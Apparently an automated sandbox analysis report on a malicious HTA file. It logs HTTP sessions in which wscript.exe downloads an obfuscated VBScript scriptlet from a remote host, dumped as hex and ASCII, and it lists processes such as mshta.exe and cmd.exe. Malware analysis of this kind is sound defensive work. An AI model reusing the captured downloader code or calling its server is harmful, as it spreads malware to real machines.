                                                                                                                                                                                                                                  x-amz-request-id: EYAWKXB488ZZ411W
                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 09:28:01 GMT
                                                                                                                                                                                                                                  Last-Modified: Mon, 10 May 2021 15:23:45 GMT
                                                                                                                                                                                                                                  ETag: "2e85899818427b96f57db55dd05d06a7"
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Content-Type: image/jpeg
                                                                                                                                                                                                                                  Content-Length: 285
                                                                                                                                                                                                                                  Server: AmazonS3
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-12-23 09:28:01 UTC285INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 72 4f 56 64 56 47 72 64 5d 64 81 79 72 88 ab ff ba ab 9d 9d ab ff fa ff cf ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff db 00 43 01 79 81 81 ab 96 ab ff ba ba ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff c0 00 11 08 00 01 00 01 03 01 22 00 02 11 01 03 11 01 ff c4 00 15 00 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 ff c4 00 14 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff c4 00 14 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff c4 00 14 11 01 00 00 00 00 00
                                                                                                                                                                                                                                  Data Ascii: JFIFCrOVdVGrd]dyrCy"


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  3192.168.2.224921892.205.57.1024434056C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-23 09:28:10 UTC325OUTGET //g1 HTTP/1.1
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                                  Host: 102.57.205.92.host.secureserver.net
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  2024-12-23 09:28:10 UTC247INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 09:28:10 GMT
                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                  Location: https://102.57.205.92.host.secureserver.net/g1/
                                                                                                                                                                                                                                  Content-Length: 357
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                  2024-12-23 09:28:10 UTC357INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 31 30 32 2e 35 37 2e 32 30 35 2e 39 32 2e 68 6f 73 74 2e 73 65 63 75 72 65 73 65 72 76 65 72 2e 6e 65 74 2f 67 31 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41
                                                                                                                                                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://102.57.205.92.host.secureserver.net/g1/">here</a>.</p><hr><address>A


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  4192.168.2.224921992.205.57.1024434056C:\Windows\SysWOW64\wscript.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-23 09:28:11 UTC325OUTGET /g1/ HTTP/1.1
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                                  Host: 102.57.205.92.host.secureserver.net
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  2024-12-23 09:28:12 UTC199INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 09:28:12 GMT
                                                                                                                                                                                                                                  Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Content-Type: text/plain;;charset=UTF-8
                                                                                                                                                                                                                                  2024-12-23 09:28:12 UTC6INData Raw: 36 35 63 38 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 65c8
                                                                                                                                                                                                                                  2024-12-23 09:28:12 UTC16384INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 0d 0a 3c 63 6f 6d 70 6f 6e 65 6e 74 20 69 64 3d 22 63 6f 6d 70 6f 6e 65 6e 74 32 22 3e 0d 0a 0d 0a 0d 0a 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 56 42 53 63 72 69 70 74 22 3e 0d 0a 3c 21 5b 43 44 41 54 41 5b 0d 0a 0d 0a 0d 0a 66 75 6e 63 74 69 6f 6e 20 64 65 4a 67 4f 55 7a 62 33 72 65 76 78 30 72 79 5f 31 37 28 63 6a 39 4c 32 77 4c 5a 74 52 37 5f 32 36 2c 20 71 63 30 53 4c 77 53 59 53 35 47 6f 77 5f 31 29 0d 0a 44 69 6d 20 55 72 79 77 4f 6b 64 4d 77 74 6e 71 44 65 45 47 5f 32 37 2c 20 69 71 54 59 68 39 67 4e 48 69 7a 79 7a 31 5f 32 38 0d 0a 55 72 79 77 4f 6b 64 4d 77 74 6e 71 44 65 45 47 5f 32 37 20 3d 20 61 73 63 28 4d 69 64
                                                                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8" ?><component id="component2"><script language="VBScript"><![CDATA[function deJgOUzb3revx0ry_17(cj9L2wLZtR7_26, qc0SLwSYS5Gow_1)Dim UrywOkdMwtnqDeEG_27, iqTYh9gNHizyz1_28UrywOkdMwtnqDeEG_27 = asc(Mid
                                                                                                                                                                                                                                  2024-12-23 09:28:12 UTC9672INData Raw: 5f 34 38 20 3d 20 43 70 51 62 76 75 6c 51 78 41 4e 6b 62 62 50 34 5f 33 34 2e 63 72 65 61 74 65 54 65 78 74 46 69 6c 65 28 74 59 46 76 57 79 6b 32 4c 38 48 44 59 51 33 6b 75 4d 69 6d 70 5f 33 39 29 0d 0a 20 20 20 20 20 20 6a 4c 48 38 42 79 67 71 4e 79 42 30 78 31 69 37 53 5f 34 38 2e 57 72 69 74 65 28 4a 6f 69 6e 28 67 75 35 67 45 58 43 52 39 70 68 53 47 39 43 39 4a 64 46 5f 34 32 2c 22 22 29 29 0d 0a 20 20 20 20 20 20 6a 4c 48 38 42 79 67 71 4e 79 42 30 78 31 69 37 53 5f 34 38 2e 43 6c 6f 73 65 20 0d 0a 45 6e 64 20 46 75 6e 63 74 69 6f 6e 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 46 75 6e 63 74 69 6f 6e 20 5a 52 67 30 6d 34 38 43 63 5f 34 39 28 4b 44 44 6f 78 50 79 74 6d 72 44 68 31 55 56 63 59 58 41 5f 35 30 2c 20 54 4e 76 44 34 70 31 62 74 6e 78 57 62
                                                                                                                                                                                                                                  Data Ascii: _48 = CpQbvulQxANkbbP4_34.createTextFile(tYFvWyk2L8HDYQ3kuMimp_39) jLH8BygqNyB0x1i7S_48.Write(Join(gu5gEXCR9phSG9C9JdF_42,"")) jLH8BygqNyB0x1i7S_48.Close End FunctionFunction ZRg0m48Cc_49(KDDoxPytmrDh1UVcYXA_50, TNvD4p1btnxWb
                                                                                                                                                                                                                                  2024-12-23 09:28:12 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                  Data Ascii:
                                                                                                                                                                                                                                  2024-12-23 09:28:12 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  5192.168.2.2249222142.250.181.1304433520C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-23 09:28:15 UTC391OUTGET /pagead/managed/js/gpt/m202412090101/pubads_impl.js HTTP/1.1
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Accept-Language: en-US
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                                                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                                                                                                  Host: securepubads.g.doubleclick.net
                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                  2024-12-23 09:28:15 UTC741INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  P3P: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
                                                                                                                                                                                                                                  Timing-Allow-Origin: *
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                  Server: cafe
                                                                                                                                                                                                                                  Content-Length: 503867
                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                  Date: Sun, 22 Dec 2024 15:29:29 GMT
                                                                                                                                                                                                                                  Expires: Mon, 22 Dec 2025 15:29:29 GMT
                                                                                                                                                                                                                                  Cache-Control: public, immutable, max-age=31536000
                                                                                                                                                                                                                                  ETag: 5395541545685299795
                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  Age: 64726
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  2024-12-23 09:28:15 UTC649INData Raw: 28 66 75 6e 63 74 69 6f 6e 28 5f 29 7b 2f 2a 20 0a 20 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 20 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 20 0a 2a 2f 20 0a 2f 2a 20 0a 20 0a 20 43 6f 70 79 72 69 67 68 74 20 47 6f 6f 67 6c 65 20 4c 4c 43 20 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 20 0a 2a 2f 20 0a 2f 2a 20 0a 20 0a 20 0a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 35 2d 32 30 31 38 20 47 6f 6f 67 6c 65 2c 20 49 6e 63 2e 2c 20 4e 65 74 66 6c 69 78 2c 20 49 6e 63 2e 2c 20 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 2e 20 61 6e 64 20
                                                                                                                                                                                                                                  Data Ascii: (function(_){/* Copyright The Closure Library Authors. SPDX-License-Identifier: Apache-2.0 */ /* Copyright Google LLC SPDX-License-Identifier: Apache-2.0 */ /* Copyright (c) 2015-2018 Google, Inc., Netflix, Inc., Microsoft Corp. and
                                                                                                                                                                                                                                  2024-12-23 09:28:15 UTC1390INData Raw: 53 20 4f 52 20 43 4f 4e 44 49 54 49 4f 4e 53 20 4f 46 20 41 4e 59 20 4b 49 4e 44 2c 20 65 69 74 68 65 72 20 65 78 70 72 65 73 73 20 6f 72 20 69 6d 70 6c 69 65 64 2e 20 0a 20 53 65 65 20 74 68 65 20 4c 69 63 65 6e 73 65 20 66 6f 72 20 74 68 65 20 73 70 65 63 69 66 69 63 20 6c 61 6e 67 75 61 67 65 20 67 6f 76 65 72 6e 69 6e 67 20 70 65 72 6d 69 73 73 69 6f 6e 73 20 61 6e 64 20 0a 20 6c 69 6d 69 74 61 74 69 6f 6e 73 20 75 6e 64 65 72 20 74 68 65 20 4c 69 63 65 6e 73 65 2e 20 0a 2a 2f 20 0a 2f 2a 20 0a 20 0a 4d 61 74 68 2e 75 75 69 64 2e 6a 73 20 28 76 31 2e 34 29 20 0a 68 74 74 70 3a 2f 2f 77 77 77 2e 62 72 6f 6f 66 61 2e 63 6f 6d 20 0a 6d 61 69 6c 74 6f 3a 72 6f 62 65 72 74 40 62 72 6f 6f 66 61 2e 63 6f 6d 20 0a 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32
                                                                                                                                                                                                                                  Data Ascii: S OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ /* Math.uuid.js (v1.4) http://www.broofa.com mailto:robert@broofa.com Copyright (c) 2
                                                                                                                                                                                                                                  2024-12-23 09:28:15 UTC1390INData Raw: 6f 2c 6d 6f 2c 77 6f 2c 6e 6f 2c 79 6f 2c 7a 6f 2c 44 6f 2c 45 6f 2c 48 6f 2c 49 6f 2c 4a 6f 2c 4c 6f 2c 52 6f 2c 54 6f 2c 58 6f 2c 59 6f 2c 63 70 2c 65 70 2c 66 70 2c 68 70 2c 69 70 2c 6e 70 2c 6f 70 2c 70 70 2c 74 70 2c 6d 70 2c 76 70 2c 77 70 2c 78 70 2c 7a 70 2c 43 70 2c 45 70 2c 46 70 2c 47 70 2c 48 70 2c 4a 70 2c 4c 70 2c 4d 70 2c 4f 70 2c 50 70 2c 51 70 2c 52 70 2c 53 70 2c 54 70 2c 58 70 2c 59 70 2c 62 71 2c 64 71 2c 63 71 2c 68 71 2c 69 71 2c 6a 71 2c 6e 71 2c 6f 71 2c 71 71 2c 70 71 2c 73 71 2c 75 71 2c 77 71 2c 46 71 2c 48 71 2c 4d 71 2c 50 71 2c 51 71 2c 5a 71 2c 62 72 2c 24 71 2c 61 72 2c 69 72 2c 6a 72 2c 73 72 2c 77 72 2c 79 72 2c 41 72 2c 44 72 2c 43 72 2c 42 72 2c 50 72 2c 53 72 2c 5a 72 2c 24 72 2c 69 73 2c 6a 73 2c 6c 73 2c 6d 73 2c 6f
                                                                                                                                                                                                                                  Data Ascii: o,mo,wo,no,yo,zo,Do,Eo,Ho,Io,Jo,Lo,Ro,To,Xo,Yo,cp,ep,fp,hp,ip,np,op,pp,tp,mp,vp,wp,xp,zp,Cp,Ep,Fp,Gp,Hp,Jp,Lp,Mp,Op,Pp,Qp,Rp,Sp,Tp,Xp,Yp,bq,dq,cq,hq,iq,jq,nq,oq,qq,pq,sq,uq,wq,Fq,Hq,Mq,Pq,Qq,Zq,br,$q,ar,ir,jr,sr,wr,yr,Ar,Dr,Cr,Br,Pr,Sr,Zr,$r,is,js,ls,ms,o
                                                                                                                                                                                                                                  2024-12-23 09:28:15 UTC1390INData Raw: 28 22 53 61 66 61 72 69 22 29 26 26 21 28 5f 2e 74 61 28 29 7c 7c 28 5f 2e 6e 61 28 29 3f 30 3a 5f 2e 6d 61 28 22 43 6f 61 73 74 22 29 29 7c 7c 5f 2e 70 61 28 29 7c 7c 28 5f 2e 6e 61 28 29 3f 30 3a 5f 2e 6d 61 28 22 45 64 67 65 22 29 29 7c 7c 28 5f 2e 6e 61 28 29 3f 6a 61 28 22 4d 69 63 72 6f 73 6f 66 74 20 45 64 67 65 22 29 3a 5f 2e 6d 61 28 22 45 64 67 2f 22 29 29 7c 7c 28 5f 2e 6e 61 28 29 3f 6a 61 28 22 4f 70 65 72 61 22 29 3a 5f 2e 6d 61 28 22 4f 50 52 22 29 29 7c 7c 5f 2e 73 61 28 29 7c 7c 5f 2e 6d 61 28 22 53 69 6c 6b 22 29 7c 7c 5f 2e 6d 61 28 22 41 6e 64 72 6f 69 64 22 29 29 7d 3b 5f 2e 74 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 5f 2e 6e 61 28 29 3f 6a 61 28 22 43 68 72 6f 6d 69 75 6d 22 29 3a 28 5f 2e 6d 61 28 22 43 68 72 6f
                                                                                                                                                                                                                                  Data Ascii: ("Safari")&&!(_.ta()||(_.na()?0:_.ma("Coast"))||_.pa()||(_.na()?0:_.ma("Edge"))||(_.na()?ja("Microsoft Edge"):_.ma("Edg/"))||(_.na()?ja("Opera"):_.ma("OPR"))||_.sa()||_.ma("Silk")||_.ma("Android"))};_.ta=function(){return _.na()?ja("Chromium"):(_.ma("Chro
                                                                                                                                                                                                                                  2024-12-23 09:28:15 UTC1390INData Raw: 63 29 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 29 3d 3d 6e 75 6c 6c 3f 76 6f 69 64 20 30 3a 64 2e 63 61 6c 6c 28 62 2c 22 73 63 72 69 70 74 5b 6e 6f 6e 63 65 5d 22 29 3b 28 62 3d 63 3d 3d 6e 75 6c 6c 3f 22 22 3a 63 2e 6e 6f 6e 63 65 7c 7c 63 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 63 65 22 29 7c 7c 22 22 29 26 26 61 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 6f 6e 63 65 22 2c 62 29 7d 3b 52 61 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 2e 73 72 63 3d 5f 2e 41 61 28 62 29 3b 51 61 28 61 29 7d 3b 5f 2e 55 61 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 69 66 28 61 20 69 6e 73 74 61 6e 63 65 6f 66 20 5f 2e 53 61 29 72 65 74 75 72 6e 20 61 2e 67 3b 74 68 72 6f 77 20 45 72 72 6f 72 28 22 22 29 3b 7d 3b 56 61 3d 66 75 6e 63 74 69 6f 6e 28 61
                                                                                                                                                                                                                                  Data Ascii: c).querySelector)==null?void 0:d.call(b,"script[nonce]");(b=c==null?"":c.nonce||c.getAttribute("nonce")||"")&&a.setAttribute("nonce",b)};Ra=function(a,b){a.src=_.Aa(b);Qa(a)};_.Ua=function(a){if(a instanceof _.Sa)return a.g;throw Error("");};Va=function(a
                                                                                                                                                                                                                                  2024-12-23 09:28:15 UTC1390INData Raw: 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 72 65 74 75 72 6e 20 61 3d 3d 3d 62 7d 3b 6b 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 66 6f 72 28 76 61 72 20 63 3d 7b 7d 2c 64 3d 30 3b 64 3c 61 2e 6c 65 6e 67 74 68 3b 64 2b 2b 29 7b 76 61 72 20 65 3d 61 5b 64 5d 2c 66 3d 62 2e 63 61 6c 6c 28 76 6f 69 64 20 30 2c 65 2c 64 2c 61 29 3b 66 21 3d 3d 76 6f 69 64 20 30 26 26 28 63 5b 66 5d 7c 7c 28 63 5b 66 5d 3d 5b 5d 29 29 2e 70 75 73 68 28 65 29 7d 72 65 74 75 72 6e 20 63 7d 3b 6c 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 66 6f 72 28 76 61 72 20 62 3d 5b 5d 2c 63 3d 30 3b 63 3c 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3b 63 2b 2b 29 7b 76 61 72 20 64 3d 61 72 67 75 6d 65 6e 74 73 5b 63 5d 3b 69 66 28 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 64 29
                                                                                                                                                                                                                                  Data Ascii: =function(a,b){return a===b};kb=function(a,b){for(var c={},d=0;d<a.length;d++){var e=a[d],f=b.call(void 0,e,d,a);f!==void 0&&(c[f]||(c[f]=[])).push(e)}return c};lb=function(a){for(var b=[],c=0;c<arguments.length;c++){var d=arguments[c];if(Array.isArray(d)
                                                                                                                                                                                                                                  2024-12-23 09:28:15 UTC1390INData Raw: 3e 31 32 26 36 33 7c 31 32 38 3b 64 5b 63 2b 2b 5d 3d 66 3e 3e 36 26 36 33 7c 31 32 38 3b 64 5b 63 2b 2b 5d 3d 66 26 36 33 7c 31 32 38 3b 63 6f 6e 74 69 6e 75 65 7d 65 6c 73 65 20 65 2d 2d 7d 69 66 28 62 29 74 68 72 6f 77 20 45 72 72 6f 72 28 22 46 6f 75 6e 64 20 61 6e 20 75 6e 70 61 69 72 65 64 20 73 75 72 72 6f 67 61 74 65 22 29 3b 66 3d 36 35 35 33 33 7d 64 5b 63 2b 2b 5d 3d 66 3e 3e 31 32 7c 32 32 34 3b 64 5b 63 2b 2b 5d 3d 66 3e 3e 36 26 36 33 7c 31 32 38 7d 64 5b 63 2b 2b 5d 3d 66 26 36 33 7c 31 32 38 7d 7d 61 3d 63 3d 3d 3d 64 2e 6c 65 6e 67 74 68 3f 64 3a 64 2e 73 75 62 61 72 72 61 79 28 30 2c 63 29 7d 72 65 74 75 72 6e 20 61 7d 3b 73 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 5f 2e 64 61 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e
                                                                                                                                                                                                                                  Data Ascii: >12&63|128;d[c++]=f>>6&63|128;d[c++]=f&63|128;continue}else e--}if(b)throw Error("Found an unpaired surrogate");f=65533}d[c++]=f>>12|224;d[c++]=f>>6&63|128}d[c++]=f&63|128}}a=c===d.length?d:d.subarray(0,c)}return a};sb=function(a){_.da.setTimeout(function
                                                                                                                                                                                                                                  2024-12-23 09:28:15 UTC1390INData Raw: 72 6e 20 61 21 3d 3d 6e 75 6c 6c 26 26 74 79 70 65 6f 66 20 61 3d 3d 3d 22 6f 62 6a 65 63 74 22 26 26 21 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 61 29 26 26 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 4f 62 6a 65 63 74 7d 3b 59 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 21 3d 6e 75 6c 6c 29 69 66 28 74 79 70 65 6f 66 20 61 3d 3d 3d 22 73 74 72 69 6e 67 22 29 61 3d 61 3f 6e 65 77 20 57 62 28 61 2c 42 62 29 3a 58 62 28 29 3b 65 6c 73 65 20 69 66 28 61 2e 63 6f 6e 73 74 72 75 63 74 6f 72 21 3d 3d 57 62 29 69 66 28 41 62 28 61 29 29 61 3d 61 2e 6c 65 6e 67 74 68 3f 6e 65 77 20 57 62 28 6e 65 77 20 55 69 6e 74 38 41 72 72 61 79 28 61 29 2c 42 62 29 3a 58 62 28 29 3b 65 6c 73 65 7b 69 66 28 21 62 29 74 68 72 6f 77 20 45 72 72 6f 72 28 29
                                                                                                                                                                                                                                  Data Ascii: rn a!==null&&typeof a==="object"&&!Array.isArray(a)&&a.constructor===Object};Yb=function(a,b){if(a!=null)if(typeof a==="string")a=a?new Wb(a,Bb):Xb();else if(a.constructor!==Wb)if(Ab(a))a=a.length?new Wb(new Uint8Array(a),Bb):Xb();else{if(!b)throw Error()
                                                                                                                                                                                                                                  2024-12-23 09:28:15 UTC1390INData Raw: 2a 28 3f 3a 2d 3f 5b 31 2d 39 5d 5c 64 2a 7c 30 29 3f 5c 73 2a 24 2f 2e 74 65 73 74 28 62 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 53 74 72 69 6e 67 28 62 29 29 3b 7d 65 6c 73 65 20 69 66 28 73 63 28 62 29 26 26 21 5f 2e 77 28 4e 75 6d 62 65 72 2c 22 69 73 53 61 66 65 49 6e 74 65 67 65 72 22 29 2e 63 61 6c 6c 28 4e 75 6d 62 65 72 2c 62 29 29 74 68 72 6f 77 20 45 72 72 6f 72 28 53 74 72 69 6e 67 28 62 29 29 3b 72 65 74 75 72 6e 20 74 63 3f 42 69 67 49 6e 74 28 61 29 3a 61 3d 75 63 28 61 29 3f 61 3f 22 31 22 3a 22 30 22 3a 71 63 28 61 29 3f 61 2e 74 72 69 6d 28 29 7c 7c 22 30 22 3a 53 74 72 69 6e 67 28 61 29 7d 3b 77 63 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 69 66 28 61 2e 6c 65 6e 67 74 68 3e 62 2e 6c 65 6e 67 74 68 29 72 65 74 75 72 6e 21 31 3b 69
                                                                                                                                                                                                                                  Data Ascii: *(?:-?[1-9]\d*|0)?\s*$/.test(b))throw Error(String(b));}else if(sc(b)&&!_.w(Number,"isSafeInteger").call(Number,b))throw Error(String(b));return tc?BigInt(a):a=uc(a)?a?"1":"0":qc(a)?a.trim()||"0":String(a)};wc=function(a,b){if(a.length>b.length)return!1;i
                                                                                                                                                                                                                                  2024-12-23 09:28:16 UTC1390INData Raw: 2e 78 63 3d 30 3b 66 6f 72 28 76 61 72 20 63 3d 61 2e 6c 65 6e 67 74 68 2c 64 3d 62 2c 65 3d 28 63 2d 62 29 25 36 2b 62 3b 65 3c 3d 63 3b 64 3d 65 2c 65 2b 3d 36 29 64 3d 4e 75 6d 62 65 72 28 61 2e 73 6c 69 63 65 28 64 2c 65 29 29 2c 5f 2e 79 63 2a 3d 31 45 36 2c 5f 2e 78 63 3d 5f 2e 78 63 2a 31 45 36 2b 64 2c 5f 2e 78 63 3e 3d 34 32 39 34 39 36 37 32 39 36 26 26 28 5f 2e 79 63 2b 3d 5f 2e 77 28 4d 61 74 68 2c 22 74 72 75 6e 63 22 29 2e 63 61 6c 6c 28 4d 61 74 68 2c 5f 2e 78 63 2f 34 32 39 34 39 36 37 32 39 36 29 2c 5f 2e 79 63 3e 3e 3e 3d 30 2c 5f 2e 78 63 3e 3e 3e 3d 30 29 3b 62 26 26 28 62 3d 5f 2e 79 28 41 63 28 5f 2e 78 63 2c 5f 2e 79 63 29 29 2c 61 3d 62 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 2c 62 3d 62 2e 6e 65 78 74 28 29 2e 76 61 6c 75 65 2c 5f
                                                                                                                                                                                                                                  Data Ascii: .xc=0;for(var c=a.length,d=b,e=(c-b)%6+b;e<=c;d=e,e+=6)d=Number(a.slice(d,e)),_.yc*=1E6,_.xc=_.xc*1E6+d,_.xc>=4294967296&&(_.yc+=_.w(Math,"trunc").call(Math,_.xc/4294967296),_.yc>>>=0,_.xc>>>=0);b&&(b=_.y(Ac(_.xc,_.yc)),a=b.next().value,b=b.next().value,_


                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                                                  Start time:04:26:50
                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:mshta.exe "C:\Users\user\Desktop\Archivo-PxFkiLTWYG-23122024095010.hta"
                                                                                                                                                                                                                                  Imagebase:0x1130000
                                                                                                                                                                                                                                  File size:13'312 bytes
                                                                                                                                                                                                                                  MD5 hash:ABDFC692D9FE43E2BA8FE6CB5A8CB95A
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                                                  Start time:04:28:03
                                                                                                                                                                                                                                  Start date:23/12/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\cmd.exe
